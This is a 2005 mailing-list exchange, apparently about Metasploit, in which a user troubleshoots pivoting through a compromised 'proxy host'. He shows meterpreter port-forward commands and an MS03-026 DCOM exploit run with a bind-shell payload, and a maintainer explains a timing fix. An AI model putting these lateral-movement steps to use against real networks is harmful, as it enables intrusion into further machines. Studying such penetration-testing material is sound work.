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use of meterpreter (copy for the list )

From: thomas.werth at (Thomas Werth)
Date: Fri, 15 Apr 2005 09:53:46 +0200

mmiller at schrieb:
On Fri, Apr 15, 2005 at 08:58:06AM +0200, Thomas Werth wrote:

Just took a second try, but i'm still doing something wrong :(
Here's "the log" :

1. Hacking "proxy Host"
2. setting up portforwarding
meterpreter> portfwd -a -L -l 9000 -h 'NextTargetIP' -p 135
portfwd: Successfully created local listener on port 9000.
meterpreter> portfwd -a -L -l 5555 -h 'NextTargetIP' -p 5555
portfwd: Successfully created local listener on port 5555.
meterpreter> portfwd -v
Local port forward listeners: <-> 'NextTargetIP':135 <-> 'NextTargetIP':5555
3. Launching another instance of metasploit and prepare next exploit

Exploit and Payload Options

 Exploit:    Name      Default      Description
 --------    ------    ---------    ------------------
 required    RHOST    The target address
 required    RPORT     9000         The target port

 Payload:    Name        Default    Description
 --------    --------    -------
 required    EXITFUNC    thread     Exit technique: "process",
"thread", "seh"
 required    LPORT       5555       Listening port for bind shell

 Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Got connection from <->

[*] Exiting Bind Handler.

maybe i setup proxy for listen Port wrong or something else ?
What do i have to fix ?

My guess is that what's happening is the bind handler is establishing
the connection before you've finished exploiting the host.  What I'd
recommend doing is waiting a few seconds to create the port 5555 port
forward until after the exploit should have completed.  Once it has,
create the port forward on port 5555 and the bind handler should
establish its connection.  Right now this is all kind of kludgey because
it isn't really fully integrated (more of a prototype), but it should
work.  What's happening right now is the bind handler is establishing
the connection to port 5555 immediately (before the exploit even takes
place) which then instructs the meterpreter server to connect to the
target host on port 5555.  Since the exploit hasn't finished, the target
host isn't listening on port 5555 and thus the meterpreter server
returns a failure indication to the client which causes it to close its
half of the port forward for that connection (thus why the bind handler

just tried that out, startet exploit set portfwd right after
[*] Connected to REMACT with group ID 0xef52
is shown, but still no luck :(
Would it be better to do a reverse bind ?
How would i set this up ?
For Example :
When using LPort 7777 and LHost = Proxy Host
I can't setup a portforwad that routs to localhost 7777, cause then
exploit fails with error msg :
Error: Could not start listener: Address already in use

It's really important to me getting this working. What can i do to get
this working ?

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